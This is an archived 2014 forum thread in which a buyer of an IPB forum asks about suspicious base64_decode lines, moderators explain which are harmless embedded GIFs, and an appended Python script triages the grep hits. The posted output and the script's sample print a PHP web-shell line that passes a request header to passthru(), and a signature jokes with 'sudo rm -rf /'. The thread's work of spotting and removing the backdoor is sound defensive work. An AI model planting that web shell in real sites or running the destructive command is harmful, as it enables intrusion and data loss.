
Virus on my website?

virus remove infection

This topic has been archived. This means that you cannot reply to this topic.
15 replies to this topic

#13 Poe


    CC Resident

  • Advanced Member
  • 81 posts

Posted 04 November 2014 - 08:43 PM

Do you mind if I ask how you obtained these files?

Did someone put them in there for a purpose or did you download a theme/plugin?


I'm just looking to avoid such complications.

(On a side note, I've never seen a virus in PHP before.)


"Portability is for those who can't write new programs" - Linus Torvalds


#14 Keslaw


    CC Lurker

  • New Member
  • 7 posts

Posted 05 November 2014 - 12:13 AM

I bought this forum. Everything was deactivated until now.

More suspicious file lines:


\forum\admin\applications\core\modules_public\task\manualResolver.php (1 hit)
Line 129:  print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_admin\statistics\stats.php (1 hit)
Line 359:  $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_public\extras\stats.php (4 hits)
Line 497:  if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) )
Line 509:  @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) );
Line 511:  echo base64_decode($string);
Line 1019:  echo base64_decode( "R0lGODlhhgAfAMQAAAAAAP///+/v79/f38/Pz7+/v6+vr5+fn4+Pj4CAgHBwcGBgYFBQUEBAQDAwMCAgIBAQE" .
\forum\admin\setup\sources\classes\output\publicOutput.php (3 hits)
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\classes\output\publicOutput.php (3 hits)
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\loginauth\openid\Auth\OpenID\Association.php (1 hit)
Line 495:         $secret = base64_decode($secret);
\forum\admin\sources\loginauth\openid\Auth\OpenID\BigMath.php (1 hit)
Line 227:         $b64 = base64_decode($str);
\forum\cache\hdinstall.php (10 hits)
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 12: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 16: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 24: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 28: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 36: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 40: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 48: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 52: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 60: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
\forum\ips_kernel\classCaptchaPlugin\default.php (1 hit)
Line 227:  print base64_decode( "...
\forum\ips_kernel\classGraph.php (1 hit)
Line 6015:  $errorIconData = base64_decode( 'R0lGODlhKQAlAPf/AP34o/75s6qGFOTi2/32jbKSIvXfTPHqy/Hx8fz3mfz2kvTcQfLx6dTDdf78ybaZNcStXPfjWqF8Df35uv'.


#15 dargueta


    I chown trolls.

  • Moderator
  • 4854 posts

Posted 05 November 2014 - 10:58 AM

None of these look particularly suspicious on their own. Can you please post the full files? Just put them in a .zip file and attach that to your post.


Edited by dargueta, 05 November 2014 - 10:58 AM.

sudo rm -rf / && echo $'Sanitize your inputs!'


#16 Alexander


    YOL9

  • Moderator
  • 3963 posts

Posted 05 November 2014 - 04:29 PM

In the captcha plugin, you will notice upon decoding that the first three characters are GIF - signifying it is simply encoded binary data that the author chose to pack into a string rather than supply as an image separately, while the 'stats' binary appears to be a very small GIF, probably a tracking pixel for legitimate purposes (one of the ROT13-encoded strings is "ugly_old_matt", curiously). Their objective was to blend in with the valid files, making removal difficult, as you may of course take out real files.

In these situations, unless there exists a script someone wrote to remove such a backdoor from your IPB installation, the best option will be to write down which plugins it uses, back up the database after checking that its contents are what you expect, and install a new and possibly less vulnerable version of IPB.


Alexander.


All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.
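The triage Alexander describes above (decode each base64 literal, look at the leading bytes for an image header, undo the ROT13 wrapper, and treat a decode of request-controlled input that reaches passthru() as the real backdoor) can be done mechanically over the grep output Keslaw posted. The script below is an added example written for this thread; it is not code from the thread, from Codecall, or from the IPB project. It assumes grep output in the "path (N hits)" / "Line N: code" shape shown in the thread, and the sample hits embedded in it are constructed from (and shortened relative to) the lines posted above, so the paths and line numbers are illustrative.

```python
"""Triage grep hits on base64_decode() in a PHP tree (added example, not IPB code).

Reads grep output shaped like the poster's ("path (N hits)" headers followed by
"Line N: <code>"), decodes every base64 literal, applies ROT13 when the line
routes the result through a rot13 helper, and sorts each hit into: an embedded
image (magic bytes), a plain string, a decode of a variable that needs manual
review, or a decode of request-controlled input fed straight to a command/eval
sink. Sample hits are constructed from the thread's output; paths are illustrative.
"""
import base64
import codecs
import re

HEADER = re.compile(r"^(?P<path>\S.*?)\s+\(\d+ hits?\)\s*$")
HIT = re.compile(r"^Line (?P<no>\d+):\s*(?P<code>.*)$")
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
# base64_decode applied to attacker-reachable superglobals instead of a literal
TAINTED_DECODE = re.compile(r"base64_decode\(\s*\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b")
# PHP functions that turn a string into a shell command or PHP code
SINKS = ("passthru", "system", "exec", "shell_exec", "eval", "assert", "popen", "proc_open")
ROT13_HINT = re.compile(r"rot13", re.IGNORECASE)
IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif", b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg"}


def decode_literal(literal: str, rot13: bool = False) -> bytes:
    """Decode a (possibly truncated) base64 literal; ROT13 it if the caller does."""
    literal = literal[: len(literal) - len(literal) % 4]  # drop a cut-off tail
    raw = base64.b64decode(literal)
    if rot13:
        # ROT13 only touches ASCII letters, so latin-1 round-trips the bytes
        raw = codecs.encode(raw.decode("latin-1"), "rot13").encode("latin-1")
    return raw


def classify_line(code: str) -> dict:
    """Return {'kind': ..., 'decoded': [...]} for one line of PHP."""
    if TAINTED_DECODE.search(code) and any(s + "(" in code for s in SINKS):
        # e.g. passthru(base64_decode($_SERVER[HTTP_CMD])): a remote command shell
        return {"kind": "backdoor-sink", "decoded": []}
    literals = B64_LITERAL.findall(code)
    if not literals:
        return {"kind": "variable-decode", "decoded": []}  # review the data source by hand
    rot13 = bool(ROT13_HINT.search(code))
    kinds, decoded = set(), []
    for lit in literals:
        data = decode_literal(lit, rot13)
        fmt = next((f for magic, f in IMAGE_MAGIC.items() if data.startswith(magic)), None)
        if fmt:
            kinds.add(f"embedded-{fmt}")
            decoded.append(f"<{fmt} {len(data)} bytes>")
            continue
        try:
            decoded.append(data.decode("ascii"))
            kinds.add("string")
        except UnicodeDecodeError:
            decoded.append(data.hex())
            kinds.add("binary-unknown")
    return {"kind": "+".join(sorted(kinds)), "decoded": decoded}


def triage_grep_output(text: str) -> list:
    """Walk grep output and attach a verdict to every 'Line N:' hit."""
    results, path = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HIT.match(line):
            results.append({"path": path, "line": int(m.group("no")), **classify_line(m.group("code"))})
        elif m := HEADER.match(line):
            path = m.group("path")
    return results


# Constructed sample in the poster's grep format (shortened; paths illustrative)
SAMPLE_HITS = r"""
\forum\admin\applications\forums\modules_admin\statistics\stats.php (1 hit)
Line 359:  $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_public\extras\stats.php (2 hits)
Line 497:  if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) )
Line 509:  @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) );
\forum\admin\sources\classes\output\publicOutput.php (1 hit)
Line 2876:  if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\loginauth\openid\Auth\OpenID\Association.php (1 hit)
Line 495:  $secret = base64_decode($secret);
\forum\cache\hdinstall.php (1 hit)
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =====
"""

if __name__ == "__main__":
    for hit in triage_grep_output(SAMPLE_HITS):
        print(f"{hit['kind']:16} {hit['path']}:{hit['line']}  {hit['decoded']}")
```

Run on the sample, the two stats.php image blobs come back as embedded GIFs, the ROT13 strings decode to "ugly_old_matt" and "Content-type: image/gif", the publicOutput.php line decodes to "year" / "i&lt;31999" (a literal comparison worth reading in context), the OpenID line is flagged only for manual review because it decodes a variable, and the hdinstall.php line is the one hit that decodes a request header straight into passthru(), which is the file a defender removes first. The classifier only sees what grep surfaced, so a decoder hidden behind string concatenation or a different encoding needs a wider search than base64_decode alone.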




